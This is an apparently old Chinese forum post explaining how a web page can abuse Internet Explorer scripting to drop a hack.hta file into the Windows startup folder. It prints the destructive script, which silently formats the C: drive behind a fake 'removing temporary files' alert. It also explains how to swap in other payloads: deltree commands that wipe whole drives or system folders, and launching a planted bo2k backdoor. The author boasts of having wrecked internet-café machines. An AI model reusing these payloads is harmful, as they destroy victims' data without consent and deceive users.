|
现在的网页是越做越黑了,通过网页往别人的硬盘中远程写入文件,对于大虾们来说这已经不是
什么新鲜事了,可是对于小鸟们却有些难度。就像你在浏览过某个网页后,一开机就出现一个叫你不要
点确定的东东,如果你点了当时就会死机。其实他这就是利用HTML向你的机器中远程写入了一个批处理
文件,只要你一开机就会运行此文件。至于怎么解除嘛…!呵呵…到黑白论坛看看吧…!我以前写过一
个更绝的,如果你用的是98系统,只要你浏览了此网页后,当你下次再启动机器时,你会发现你的98再也
启不着了。这个网页使本地的很多网吧都不得不重装系统(其实是他们网管的水平有限),破解方法很简
单,谁都能做到。可是由于危害到很多普通用户后来我就将网页全删了。没想到事隔几个月,现在竟然都
能用网页格他的硬盘了,真是不可思议啊…!其实这并不是什么难事,如果你懂一点HTML的知识你也能做
到的。
其实原理很简单是利用微软( Microsoft )的IE浏览器( Internet Explorer )所衍生出来的攻击方法。
以下这段就是具有破坏性的HTML
Hacking Your Computer .
scr.Reset();
scr.Path="C:\\WINDOWS\\Start Menu\\Programs\\启动\\hack.hta";
scr.Doc="
wsh.Run('start.exe /m format c:/q /autotest /u');
alert('IMPORTANT : Windows is removing unused temporary files.');";
scr.write();
(懂HTML的人应该就看得出来其中精随)
现在我大概来解释其中几个项目所写的意思
scr.Path="C:\\WINDOWS\\Start Menu\\Programs\\启动\\hack.hta"
这一项就是指当你看到这网页它会写入到你的电脑启动目录底下,并命名为
hack.hta
wsh.Run('start.exe /m format c:/q /autotest /u');
通常要格式化硬碟都会先问你是否要执行,但其中的"/autotest"这项。
它是一个微软没有公开的功能,键入後format的动作便会被强制执行。
这项中的/q /u是令系统不需要检查硬碟便会立即执行的指令。
最後start.exe再配合/m选项可以使format的DOS-prompt视窗在执行的时候处於最小
化的状态。
执行其他攻击指令的方法∶
只要修改“start.exe /m format c:/q /autotest /u”这一项便形。
start.exe /m format c:/q /autotest /u
其中的“c:”可以换做其他的硬碟。
(path)\bo2k.exe
执行它电脑中的某个程式,如果你有传bo2k到它电脑中就可以使用此指令。
start.exe /m deltree /y a:\*.* c:\*.* d:\*.*
杀掉对方硬碟底下所有的档案。
start.exe /m deltree /y c:\windows\system\*.*
杀掉对方c:\windows\system\目录底下的所有档案。
怎么样?厉害吧…!(如果只研究一下这个代码是没什么的,希望大家不要将其生成HTM文件,否则后果自负)。
| 
转播
分享
淘帖
分享到新浪微博
